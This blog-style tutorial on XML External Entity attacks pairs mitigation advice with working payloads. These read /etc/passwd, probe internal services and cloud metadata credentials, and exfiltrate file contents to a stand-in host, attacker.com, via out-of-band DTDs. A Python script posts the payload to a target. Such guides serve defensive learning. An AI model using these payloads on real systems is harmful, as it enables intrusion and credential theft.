XXE Attacks: Understanding and Exploiting XML External Entity Vulnerabilities

January 15, 2025

by Kieran Jessup

What is XXE?

XML External Entity (XXE) attacks are a type of web security vulnerability that occurs when weakly configured XML parsers support XML features that allow external entity references. This vulnerability can lead to:

File Disclosure: Reading sensitive files from the server
Server-Side Request Forgery (SSRF): Making requests to internal services
Remote Code Execution (RCE): In some cases, executing arbitrary code
Denial of Service (DoS): Through entity expansion attacks

How XXE Works

XML External Entity Basics

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Understanding XXE Vulnerabilities

HIGH SEVERITY

XML External Entity Structure:

XXE attacks leverage the XML DOCTYPE declaration to define external entities that reference external resources. When the XML parser processes these entities, it attempts to fetch the referenced content.

Key Components:

DOCTYPE Declaration: Defines the document type and entities
ENTITY Definition: Creates a reference to an external resource
SYSTEM Keyword: Indicates the entity references an external URI
Entity Reference: &xxe; tells the parser to fetch the external content

Attack Flow:

Attacker sends malicious XML with external entity reference
XML parser processes the DOCTYPE declaration
Parser attempts to fetch the external resource
Content is included in the XML document
Response may contain sensitive data

MITRE ATT&CK: T1190 - Exploit Public-Facing Application
OWASP Top 10: A05:2021 - Security Misconfiguration
CWE: CWE-611 - Improper Restriction of XML External Entity Reference

Common XXE Attack Vectors

1. File Disclosure

The most common XXE attack involves reading sensitive files from the server:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

This payload attempts to read the /etc/passwd file, which contains user account information.

2. SSRF via XXE

XXE can be used to perform Server-Side Request Forgery attacks:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">]>
<foo>&xxe;</foo>

This can help attackers discover and access internal services that aren’t directly accessible from the internet.

3. Out-of-Band (OOB) XXE

When direct file reading isn’t possible, attackers can use OOB techniques:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;]>
<foo>&send;</foo>

With the external DTD file containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%send;

Real-World XXE Example

Let’s examine a practical XXE vulnerability in a web application:

XXE Payload Injection

Request

POST https://vulnerable-app.com/api/process

Headers:

Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: */*
Content-Length: 156

Body:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>

Response

200 OK

Headers:

HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx/1.18.0

Body:

{
"status": "success",
"user": {
  "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin",
  "email": "test@example.com"
}
}

Advanced XXE Techniques

1. Parameter Entity Expansion

For more complex attacks, parameter entities can be used:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<data>&exfil;</data>

2. XXE in Different Protocols

XXE can exploit various protocols beyond file://:

Protocol Exploitation

# File Protocol
<!ENTITY xxe SYSTEM "file:///etc/passwd">

# HTTP Protocol  
<!ENTITY xxe SYSTEM "http://internal-service/admin">

# FTP Protocol
<!ENTITY xxe SYSTEM "ftp://attacker.com/evil">

# PHP Wrapper
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">

# Data Protocol
<!ENTITY xxe SYSTEM "data://text/plain;base64,PD94bWw+">

XXE Protocol Support

HIGH SEVERITY

Protocol Support in XXE:

Different XML parsers support various protocols for external entity resolution. The supported protocols determine the attack vectors available to attackers.

Common Protocols:

file:// - Read local files (most common)
http:// - Make HTTP requests (SSRF)
ftp:// - FTP protocol support
php:// - PHP stream wrappers
data:// - Data URI scheme
gopher:// - Gopher protocol (rare)

PHP Wrapper Techniques:

PHP applications often support stream wrappers that can be exploited:

Base64 Encoding: php://filter/read=convert.base64-encode/resource=file
Zlib Compression: php://filter/read=zlib.deflate/resource=file
Input Filtering: php://input for POST data processing

Security Implications:

File disclosure across multiple protocols
Internal network reconnaissance
Bypass of access controls
Data exfiltration via multiple channels

3. XXE in Different File Formats

XXE isn’t limited to XML files. Many file formats support XML:

Office Documents: .docx, .xlsx, .pptx
PDF Files: Some PDF parsers support XML
SVG Images: Scalable Vector Graphics
SOAP APIs: Web services using XML
RSS Feeds: Really Simple Syndication

Detection and Exploitation

1. Identifying XXE Vulnerabilities

XXE Detection Methods

# 1. Look for XML Processing
- SOAP APIs
- REST APIs accepting XML
- File upload functionality
- Document processing

# 2. Test with Simple Payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<test>&xxe;</test>

# 3. Monitor for Outbound Requests
- Check server logs
- Monitor network traffic
- Use Burp Collaborator

# 4. Error-Based Detection
- Look for XML parsing errors
- Check for file path disclosures
- Monitor for timeout responses

Finding XXE Vulnerabilities

MEDIUM SEVERITY

XXE Detection Strategy:

Identifying XXE vulnerabilities requires a systematic approach to find XML processing endpoints and test their security.

Common Entry Points:

API Endpoints: REST/SOAP services accepting XML
File Uploads: Document processing applications
Form Submissions: Web forms that process XML data
Import Features: Data import functionality
Search Functions: Advanced search with XML queries

Testing Methodology:

Reconnaissance: Identify XML processing endpoints
Basic Testing: Send simple XXE payloads
Error Analysis: Monitor for parsing errors
Outbound Testing: Use OOB techniques
Protocol Testing: Test different URI schemes

Indicators of Vulnerability:

XML parsing errors in responses
File content appearing in responses
Outbound HTTP requests to attacker servers
Timeout responses indicating processing delays
Error messages revealing file paths

2. Automated XXE Testing

Several tools can help automate XXE detection:

# OWASP ZAP
zap-cli quick-scan --self-contained --start-options "-config api.disablekey=true" https://target.com

# Burp Suite Professional
# Use the XXE Scanner extension

# Custom Python Script
import requests

xxe_payload = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>'''

response = requests.post('https://target.com/api/process', 
                        data=xxe_payload,
                        headers={'Content-Type': 'application/xml'})
print(response.text)

Mitigation Strategies

1. Disable External Entity Processing

The most effective mitigation is to disable external entity processing entirely:

Java (SAX Parser):

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python (lxml):

from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse(xml_file, parser)

PHP:

libxml_disable_entity_loader(true);

2. Input Validation and Sanitization

XXE Mitigation Techniques

# 1. Disable DOCTYPE Processing
- Set disallow-doctype-decl feature
- Disable external entity resolution
- Use secure XML parsers

# 2. Input Validation
- Whitelist allowed XML elements
- Block DOCTYPE declarations
- Validate XML structure

# 3. Output Encoding
- Encode XML output
- Sanitize user input
- Use parameterized queries

# 4. Network Security
- Block outbound requests
- Use firewalls
- Monitor network traffic

# 5. Security Headers
- Content Security Policy
- X-Content-Type-Options
- X-Frame-Options

Preventing XXE Attacks

LOW SEVERITY

Comprehensive XXE Mitigation:

Preventing XXE attacks requires a multi-layered approach combining technical controls, input validation, and security monitoring.

Technical Controls:

Parser Configuration: Disable external entity processing
Feature Flags: Use secure XML parser features
Library Updates: Keep XML libraries updated
Alternative Parsers: Use XXE-resistant parsers

Input Validation:

Schema Validation: Use XML Schema (XSD) validation
Content Filtering: Block DOCTYPE declarations
Element Whitelisting: Only allow expected XML elements
Size Limits: Restrict XML document size

Network Security:

Outbound Filtering: Block external requests from servers
Firewall Rules: Restrict network access
Monitoring: Log and alert on suspicious requests
Segmentation: Isolate XML processing services

Security Best Practices:

Principle of Least Privilege: Minimize server permissions
Regular Audits: Test for XXE vulnerabilities
Security Training: Educate developers about XXE
Incident Response: Have a plan for XXE incidents

3. Secure XML Processing Libraries

Use XXE-resistant XML processing libraries:

Java:

// Use JAXB instead of SAX/DOM for simple cases
JAXBContext context = JAXBContext.newInstance(MyClass.class);
Unmarshaller unmarshaller = context.createUnmarshaller();

Python:

# Use defusedxml instead of standard library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

Node.js:

// Use xml2js with secure options
const xml2js = require('xml2js');
const parser = new xml2js.Parser({
  explicitArray: false,
  ignoreAttrs: true,
  explicitRoot: false
});

Real-World XXE Examples

1. Adobe Flash XXE (CVE-2015-3269)

Adobe Flash Player had an XXE vulnerability that allowed attackers to read local files:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
&xxe;
</cross-domain-policy>

2. WordPress XXE (CVE-2017-9062)

WordPress had an XXE vulnerability in the XML-RPC functionality that allowed file disclosure:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>&file;</value></param>
</params>
</methodCall>

XXE in Modern Applications

1. API Security

Modern REST APIs often process XML data and may be vulnerable to XXE:

API XXE Example

Request

POST https://api.example.com/v1/users

Headers:

Content-Type: application/xml
Authorization: Bearer token123
Accept: application/json

Body:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>

Response

200 OK

Headers:

HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx

Body:

{
"id": 123,
"name": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin",
"email": "test@example.com",
"created_at": "2025-01-15T10:30:00Z"
}

2. Cloud Services

Cloud services and serverless functions may also be vulnerable to XXE:

<!-- AWS Lambda XXE Example -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
<data>&xxe;</data>

Advanced XXE Exploitation

When direct file reading isn’t possible, blind XXE techniques can be used:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<data>&exfil;</data>

2. XXE for RCE

In some cases, XXE can lead to remote code execution:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "expect://id">]>
<data>&xxe;</data>

Tools and Resources

1. XXE Testing Tools

Burp Suite Professional: Built-in XXE scanner
OWASP ZAP: Free XXE detection
XXEinjector: Python-based XXE testing tool
XXE-Out-of-Band: OOB XXE exploitation tool

2. Payload Repositories

PayloadsAllTheThings: Comprehensive XXE payloads
OWASP XXE Cheat Sheet: Official OWASP guidance
HackTricks XXE: Practical exploitation techniques

3. Learning Resources

PortSwigger XXE Lab: Interactive XXE training
OWASP WebGoat: XXE vulnerability training
HackTheBox: XXE challenge machines

Conclusion

XXE attacks remain a significant threat to web applications that process XML data. Understanding the vulnerability, exploitation techniques, and mitigation strategies is crucial for security professionals and developers.

Key takeaways:

XXE is still prevalent in modern applications despite being well-known
Multiple attack vectors exist beyond simple file reading
Comprehensive mitigation requires technical controls and security practices
Regular testing is essential to detect XXE vulnerabilities
Security awareness among developers is crucial for prevention

By implementing proper security controls, using secure XML parsers, and maintaining security awareness, organizations can effectively protect against XXE attacks and maintain the security of their applications.

References

📚 Official Documentation

OWASP XXE Prevention Cheat Sheet - Comprehensive mitigation guide
CWE-611: Improper Restriction of XML External Entity Reference - Official vulnerability classification
MITRE ATT&CK: T1190 - Exploit Public-Facing Application - Attack technique framework

🔬 Learning Resources

PortSwigger XXE Lab - Interactive XXE training environment
PayloadsAllTheThings XXE - Comprehensive payload collection
HackTricks XXE Guide - Practical exploitation techniques

🛠️ Tools & Testing

XXEinjector - Automated XXE testing tool
XXE-Out-of-Band - OOB XXE exploitation framework
OWASP ZAP - Free web application security scanner

📖 Additional Reading

OWASP WSTG: XML External Entity Testing - Testing methodology
OWASP XXE Processing - Detailed vulnerability information
OWASP XXE Prevention - Prevention strategies and best practices

If you found this XXE guide helpful, you might also be interested in these related posts from my blog:

Practical XXE Examples:

HTB - BountyHunter - Real-world XXE exploitation walkthrough with file disclosure and privilege escalation

Learning Path:

Start with: PortSwigger XXE Lab - Interactive XXE training environment
Practice on: HTB - BountyHunter - See XXE in action with a complete walkthrough
Advanced: Apply these techniques to your own testing and bug bounty programs

External HTB Machines with XXE:

For additional practice, consider these HackTheBox machines that feature XXE vulnerabilities:

HTB - DevVortex - Features XXE in a web application with file disclosure
HTB - Pandora - Includes XXE exploitation in a monitoring system
HTB - Validation - Web application with XXE and SSRF vectors
HTB - Backend - API-based XXE exploitation
HTB - Interface - Modern web application with XXE vulnerabilities

XXE Attacks: Understanding and Exploiting XML External Entity Vulnerabilities

What is XXE?

How XXE Works

Understanding XXE Vulnerabilities

XML External Entity Structure:

Key Components:

Attack Flow:

Common XXE Attack Vectors

1. File Disclosure

2. SSRF via XXE

3. Out-of-Band (OOB) XXE

Real-World XXE Example

XXE Payload Injection

Request

Response

Advanced XXE Techniques

1. Parameter Entity Expansion

2. XXE in Different Protocols

XXE Protocol Support

Protocol Support in XXE:

Common Protocols:

PHP Wrapper Techniques:

Security Implications:

3. XXE in Different File Formats

Detection and Exploitation

1. Identifying XXE Vulnerabilities

Finding XXE Vulnerabilities

XXE Detection Strategy:

Common Entry Points:

Testing Methodology:

Indicators of Vulnerability:

2. Automated XXE Testing

Mitigation Strategies

1. Disable External Entity Processing

2. Input Validation and Sanitization

Preventing XXE Attacks

Comprehensive XXE Mitigation:

Technical Controls:

Input Validation:

Network Security:

Security Best Practices:

3. Secure XML Processing Libraries

Real-World XXE Examples

1. Adobe Flash XXE (CVE-2015-3269)

2. WordPress XXE (CVE-2017-9062)

XXE in Modern Applications

1. API Security

API XXE Example

Request

Response

2. Cloud Services

Advanced XXE Exploitation

1. Blind XXE

2. XXE for RCE

Tools and Resources

1. XXE Testing Tools

2. Payload Repositories

3. Learning Resources

Conclusion

References

📚 Official Documentation

🔬 Learning Resources

🛠️ Tools & Testing

📖 Additional Reading

Related Boxes

Practical XXE Examples:

Learning Path:

External HTB Machines with XXE: